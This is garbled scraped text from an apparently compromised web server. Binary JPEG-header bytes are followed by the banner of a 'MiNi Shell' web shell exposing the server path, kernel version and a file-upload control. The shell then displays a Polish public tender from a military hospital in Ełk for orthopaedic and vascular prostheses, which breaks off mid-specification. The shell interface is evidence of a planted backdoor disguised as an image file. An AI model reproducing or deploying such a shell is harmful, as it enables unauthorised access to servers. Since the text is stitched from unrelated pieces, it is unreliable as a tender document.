JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120130/24797-N-2012.html

<p class="kh_header"><b>Ełk: Dostawa endoprotez ortopedycznych oraz protez naczyniowych. Numer sprawy: 05/2012-DZP/PNO</b><br>
<b>Numer ogłoszenia: 24797 - 2012; data zamieszczenia: 30.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa endoprotez ortopedycznych oraz protez naczyniowych. Numer sprawy: 05/2012-DZP/PNO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa endoprotez ortopedycznych i protez naczyniowych
na potrzeb Bloku Operacyjnego 108 Szpitala Wojskowego z Przychodnią  w asortymencie 
oraz zamawianych ilościach wyszczególnionych w formularzach cenowych stanowiących Załączniki Nr 2

Zamówienie obejmuje 4 Zadania.

	Przedmioty dostawy zamieszczone w ofercie powinny posiadać dokładny i czytelny opis przedmiotu zamówienia na opakowaniu oraz stosowne certyfikaty lub atesty dopuszczające 
ich stosowanie w służbie zdrowia zgodnie z polskim prawem oraz prawem Unii Europejskiej (powinny odpowiadać określonym normom lub specyfikacjom technicznym, posiadać aktualne świadectwo dopuszczenia do obrotu oferowanych środków wymagane prawem).
	Przedmioty dostawy zamieszczone w ofercie powinny być bezpieczne w użyciu dla pacjentów oraz dla personelu.
	Oznakowanie dostarczonych wyrobów, instrukcje użytkowania, opis wyrobu, etykiety (oryginalne) muszą być sporządzone w języku polskim.
	Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ 
i dopuszcza składanie ofert równoważnych o parametrach techniczno /eksploatacyjno / użytkowych nie gorszych niż , podane w opisie przedmiotu zamówienia. Podstawa prawna: art. 29 ust. 3 Ustawy Prawo Zamówień Publicznych.

Zadanie Nr 1 - 	Endoproteza bezcementowa stawu biodrowego anatomiczna pierwotna

Zadanie Nr 2 - 	Endoprotezy bezcementowa i cementowa (zakładane jednym instrumentem) stawu biodrowego

Zadanie Nr 3 - 	Protezy naczyniowe proste z PTFE zbrojne oraz niezbrojnie

Zadanie Nr 4 - 	Protezy naczyniowe rozwidlone.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7, 33.18.42.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w zakresie poszczególnych zadań od 1 do 4 w wysokości:

1)	dla zadania nr 1 w wysokości: 5 000,00 zł, 
słownie: pięć tysięcy złotych 
2)	dla zadania nr 2 w wysokości: 4 000,00 zł, 
słownie: cztery tysiące złotych 
3)	dla zadania nr 3 w wysokości: 300,00 zł, 
słownie: trzysta złotych  
4)	dla zadania nr 4 w wysokości: 700,00 zł, 
słownie: siedemset złotych 
wadium dla całości przedmiotu zamówienia w wysokości: 10 000,00 zł, 
słownie: dziesięć tysięcy złotych 
Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: Bank Gospodarstwa Krajowego Oddział Olsztyn nr 61 1130 1189 0025 0021 1720 0002 z adnotacją  WADIUM - Dostawa endoprotez ortopedycznych i protez naczyniowych
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) 
w terminie 2012-03-12, godzina 10:00 sposób przekazania: Dowód wpłaty wadium dołączyć do oferty.
2.	Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
3.	W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
4.	W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, trzech dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Razem z ofertą wykonawca zobowiązany będzie złożyć następujące dokumenty nie wymienione powyżej: Formularz ofertowy, Formularz cenowy, Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych, Wykaz wykonanych dostaw, Dowód wniesienia wadium, Aktualne dokumenty dopuszczające do obrotu i używania na terenie RP asortyment objęty zamówieniem, dla którego jest to wymagane, zgodnie z ustawą o wyrobach medycznych z dn. 20 maja 2010 r. (Dz. U. z 2010 r. Nr 107, poz. 679) oraz innymi obowiązującymi przepisami prawa w tym zakresie: deklarację zgodności CE, wpis lub zgłoszenie do rejestru wyrobów medycznych; NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER ZADANIA I POZYCJI PRZEDMIOTU ZAMÓWIENIU.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień w art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych:
1.	Ceny jednostkowe mogą ulec zmianie wyłącznie na  skutek: zaistnienia  możliwości obniżenia cen zmiany korzystne dla Zamawiającego - promocje.
2.	W przypadku wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi  okolicznościami: siła wyższa uniemożliwiająca wykonanie przedmiotu umowy   zgodnie ze szczegółowym opisem przedmiotu zamówienia, zmiany dotyczące danych obydwu stron umowy w tym zmiana osoby reprezentującej, zmiany teleadresowe,  zmiany w nazwie firmy, zmiany rachunku bankowego, itp.
3.	zmiana wielości opakowania nie powodująca zmiany ogólnej ilości (sztuk) objętego przedmiotową umową oraz nie powodująca zmiany ceny 
4.	Zamawiający w trakcie realizacji umowy może dokonać przesunięć ilościowych asortymentu, według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie.  
5.	Zamawiający dopuszcza zmianę ceny w przypadku zmiany przepisów prawa podatkowego w okresie obowiązywania umowy dotyczących stawek VAT, przy czym zmiana nastąpi w wartości brutto, wartość netto pozostaje bez zmian 
6.	Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do złożenia  na piśmie wniosku o zmianę postanowień zawartej umowy wraz z uzasadnieniem zaistnienia okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2012 godzina 09:30, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 10.05.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - 	Endoproteza bezcementowa stawu biodrowego anatomiczna pierwotna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trzpień modularny, anatomiczny (prawy, lewy, bezkołnierzowy z antywersją, wykonany ze stopu tytanu. Powierzchnia stykająca się z kością pokrytą hydroksyapatytem. Kąt szyjkowo - trzonowy 130 stopni. Stożek V40 									
Głowa metalowa o średnicy 28 i 32 mm w co najmniej trzech długościach szyjki 									
Głowa ceramiczna o średnicy 28, 32, 36 mm w co najmniej trzech długościach szyjki									
Panewki sferyczne lub hemisferyczne, bezcementowa, tytanowe, pokryte hyroksyapatytem, w rozmiarach średnicy zewnętrznej od 42 do 70 mm (skok co 2 mm) w dwu opcjach: 
1. Panewka typu press-fit pełna lub z otworami z możliwością dodatkowej stabilizacji za pomocą śrub. 
2. Panewka wkręcana z gwintem na obrzeżu bez hydroksyapatytu								
Panewka wkręcana, z gwintem na obrzeżu  (bez hydroksyapatytu )									
Panewki hemisferyczne z czystego tytanu CPTI o budowie pozwalającej na przerost kości w strukturę panewki.									
Śruby tytanowe, zatyczki									
Wkładka polietylenowa III generacji typu X3 bezokapowa i z okapem 10 stopni									
Wkładka ceramiczna typu sandwicz na metalowym amortyzatorze z systemem zatrzaskującym, o średnicach wewnętrznych: 28, 32, 36 mm. System wymusza wzrost średnicy wewnętrznej wkładki ceramicznej wraz ze wzrostem panewki.									
Wkładka antyluksacyjna, związana bezcementowa do głowy 28 mm			Trzpień		szt.	40
Głowa metalowa		szt.	30
Głowa ceramiczna		szt.	10
Panewka sferyczna lub hemisferyczna		szt.	35
Panewka wkręcana		szt.	3
Panewki z czystego tytanu CPTi		szt.	2
Śruby tytanowe, zatyczki		szt.	40
Wkładka polietylenowa		szt.	30
Wkładka ceramiczna		szt.	10
Wkładka antyluksacyjna bezcementowa		szt.	5
						
NA CZAS TRWANIA UMOWY NALEŻY DOSTARCZYĆ NIEODPŁATNIE ZESTAW NARZĘDZIOWY POTRZEBNY DO ZAŁOŻENIA IMPLANTÓW. WYKONAWCA ZOBOWIĄZANY JEST DO UTWORZENIA NA TERENIE SIEDZIBY ZAMAWIAJĄCEGO BANKU IMPLANTÓW , UZUPEŁNIANE BANKU NASTĘPOWAĆ BĘDZIE NA BIEŻĄCO NA PODSTAWIE PROTOKOŁU ZUŻYCIA. W  BANKU MUSZĄ ZNAJDOWAĆ SIĘ CO NAJMNIEJ DWA KOMPLETY (WSZYSTKIE ROZMIARY IMPLANTÓW), Z OBOWIĄZKIEM  UZUPEŁNIENIA ICH W CIĄGU DWÓCH DNI ROBOCZYCH.									
IMPLANTY STANOWIĄCE ASORTYMENT BANKU ORAZ INSTRUMENTARIUM STANOWIĄCE PRZEDMIOT UŻYCZENIA ZOSTANĄ PRZEKAZANE PRZEZ WYKONAWCĘ PROTOKOŁEM PRZYJĘCIA PRZEKAZANIA DO APTEKI ZAKŁADOWEJ ZAMAWIAJĄCEGO Z DOŁĄCZONYM WYKAZEM POZYCJI ASORTYMENTOWYCH POZOSTAWIONYCH W DEPOZYT BANKOWY W TERMINIE DO 7 DNI LICZĄC OD DNIA PODPISANIA UMOWY.									
WYKONAWCA ZOBOWIĄZANY JEST DOSTARCZYĆ STRONY KATALOGOWE Z OPISAMI TECHNICZNYMI OFEROWANYCH PRZEDMIOTÓW ZAMÓWIENIA W MOMENCIE TWORZENIA BANKU. 									
ZAMAWIAJĄCY PO OTWARCIU OFERT MOŻE PRZESŁAĆ DO WYKONAWCÓW WYKAZ ŻĄDANYCH PRÓBEK Z PODANIEM TERMINU ICH DOSTARCZENIA.									
ZAMAWIAJĄCY NIE DOPUSZCZA SKŁADANIA OFERT NA POSZCZEGÓLNE POZYCJE ASORTYMENTOWE W RAMACH JEDNEGO ZADANIA.									
ZAMAWIAJĄCY WYMAGA ZAPEWNIENIA SZKOLENIA PERSONELU  W ZAKRESIE TECHNIK OPERACYJNYCH Z ZASTOSOWANIEM ZAMAWIANYCH IMPLANTÓW UDOKUMENTOWANE CERTYFIKATEM I PUNKTAMI SZKOLENIOWYMI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.31.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - 	Endoprotezy bezcementowa i cementowa (zakładane jednym instrumentem) stawu biodrowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BEZCEMENTOWA										
1	Trzpień prosty, z pobocznymi skrzydełkami derotacyjnymi, tytanowy w 1/3 pokryty plazmą tytanową, euro stożek 12/14, bezkołnierzowy min. 10 rozmiarach, z offsetem rosnącym z każdym rozmiarem trzpienia oraz w opcji trzpień prosty, bezkołnierzowy w min. 10 rozmiarach, ze zwiększonym off-setem rosnącym z każdym rozmiarem trzpienia,									
2	Główka metalowa O 28 w 5 długościach szyjki (S, M, L, XL, XXL)									
3	Główka ceramiczna  O 32 w 3 długościach szyjki (S, M, L) 									
4	Panewka hemisferyczna tytanowa press - fit o średnicach zewnętrznych od 42 do 68 mm ze skokiem co 2 mm, pokryta plazmą tytanową, bezotworowa i z otworami do kotwiczenia wraz z 2 śrubami tytanowymi do kotwiczenia w komplecie, oraz w opcji zamiennie panewka hemisferyczna tytanowa wkręcana w rozmiarach od 44 - 68 mm,									
5	Wkład polietylenowy  O 28 mm o podwyższonej odporności na ścieranie, symetryczny,  asymetryczny i nadbudową tylnej ściany (kompatybilne z panewką hemisferyczną tytanową press - fit i panewką hemisferyczną tytanową wkręcaną).									
6	Wkład ceramiczny O 32 mm symetryczny									
CEMENTOWA										
1	Trzpień prosty, z pobocznymi skrzydełkami derotacyjnymi, chromo-kobaltowy, euro stożek 12/14, bezkołnierzowy w min. 5 rozmiarach, z offsetem rosnącym z każdym rozmiarem trzpienia oraz w opcji trzpień prosty, bezkołnierzowy w min. 5 rozmiarach, ze zwiększonym off-setem rosnącym z każdym rozmiarem trzpienia,									
